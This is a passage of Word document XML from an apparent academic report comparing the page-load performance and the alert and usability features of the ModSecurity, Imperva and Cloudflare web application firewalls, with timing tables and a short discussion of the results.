              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="446A0293" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>471.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00824FF4" w:rsidRPr="00824FF4" w14:paraId="37D276E2" w14:textId="77777777" w:rsidTr="001923E2">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3360"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AEF0171" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="006E37A7" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E37A7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Average</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1221" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E17115C" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>538.08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1640" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3601D0F0" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>535.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB94AD8" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>596.96</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1339" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2579417F" w14:textId="77777777" w:rsidR="00824FF4" w:rsidRPr="00824FF4" w:rsidRDefault="00824FF4" w:rsidP="006A43F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00824FF4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>605.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="391DD100" w14:textId="76EC9910" w:rsidR="00DF65EB" w:rsidRDefault="00DF65EB" w:rsidP="006A43F5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc71138544"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00E72098">
        <w:t>Performance test results, average in milliseconds (n = 200 requests)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="06A939F8" w14:textId="2175A3E8" w:rsidR="00A41F3E" w:rsidRDefault="00A41F3E" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">From the results of the performance test in Table </w:t>
      </w:r>
      <w:r w:rsidR="00817DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, it was observed that the </w:t>
      </w:r>
      <w:r w:rsidR="00817DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">average duration taken to load the index page from the server without WAF and the server with ModSecurity configured had a negligible difference, where the server with ModSecurity was slightly less </w:t>
      </w:r>
      <w:r w:rsidR="00817DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>than 3 ms faster</w:t>
      </w:r>
      <w:r w:rsidR="00C80AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, 538.</w:t>
      </w:r>
      <w:r w:rsidR="00466ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>08</w:t>
      </w:r>
      <w:r w:rsidR="00C80AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ms versus 535.7 ms</w:t>
      </w:r>
      <w:r w:rsidR="00817DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006A4373">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Despite the average results from both servers, it was also observed that the server without WAF performed better when loaded from three of the countries</w:t>
      </w:r>
      <w:r w:rsidR="00E91843">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – South Africa, Russia and Australia. Meanw</w:t>
      </w:r>
      <w:r w:rsidR="006A4373">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>hile</w:t>
      </w:r>
      <w:r w:rsidR="00E91843">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="006A4373">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> server with ModSecurity performed better when loaded from two countries – Singapore and United States.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D1D41" w14:textId="38D6CEA7" w:rsidR="0022551E" w:rsidRDefault="00C80AAD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The duration taken to load the index page from servers that had Imperva and Cloudflare </w:t>
      </w:r>
      <w:r w:rsidR="00F93531">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>configured were 596.9</w:t>
      </w:r>
      <w:r w:rsidR="00466ACC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>6 ms and 605.16 ms respectivel</w:t>
      </w:r>
      <w:r w:rsidR="006007A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">y, a difference of slightly more than 8 ms. Between the two servers, Imperva performed better in four countries while Cloudflare only performed better in one country – Singapore. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2AF9E" w14:textId="6F7A017C" w:rsidR="00694B37" w:rsidRDefault="00694B37" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Although the difference in results were negligible when comparing the results between two servers at a time, it becomes more evident when comparing the slowest and fastest average duration taken to load the index page.</w:t>
      </w:r>
      <w:r w:rsidR="00D1495F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The difference was 69.46 ms, where ModSecurity performed better than Cloudflare in four countries except Russia.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3697EE21" w14:textId="28772C77" w:rsidR="005F1D6F" w:rsidRPr="00DE6606" w:rsidRDefault="005F1D6F" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Overall, the total average results showed that the server with ModSecurity configured performed the best, followed by without WAF, Imperva and Cloudflare.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25218F0D" w14:textId="6DD9ED6F" w:rsidR="00A41F3E" w:rsidRPr="00DE6606" w:rsidRDefault="0085186C" w:rsidP="0085186C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc71138501"/>
      <w:r>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r w:rsidR="00A41F3E" w:rsidRPr="00DE6606">
        <w:t>Alerts/Usability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="40A5D786" w14:textId="04094F48" w:rsidR="00066AEC" w:rsidRDefault="00066AEC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Each WAF produces alerts when a traffic is blocked or denied. Table 2 shows the results of alerts and usability of each WAF.</w:t>
      </w:r>
      <w:r w:rsidR="007C5DC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7143" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3040"/>
        <w:gridCol w:w="1383"/>
        <w:gridCol w:w="1360"/>
        <w:gridCol w:w="1360"/>
      </w:tblGrid>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="77A0E3DB" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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60363CD" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Items</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B18AA6E" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C4F1A92" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Imperva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31BB405C" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="76CEAFBA" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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725251F9" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Informative error page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B1FC2C1" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C7F4558" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69943C00" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00066AEC" w:rsidRPr="00637B42" w14:paraId="3533CADE" w14:textId="77777777" w:rsidTr="001448F3">
        <w:trPr>
          <w:trHeight w:val="30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723869B4" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Alerts/Security logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1383" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="793C1766" w14:textId="77777777" w:rsidR="00066AEC" w:rsidRPr="00637B42" w:rsidRDefault="00066AEC" w:rsidP="001448F3">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637B42">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
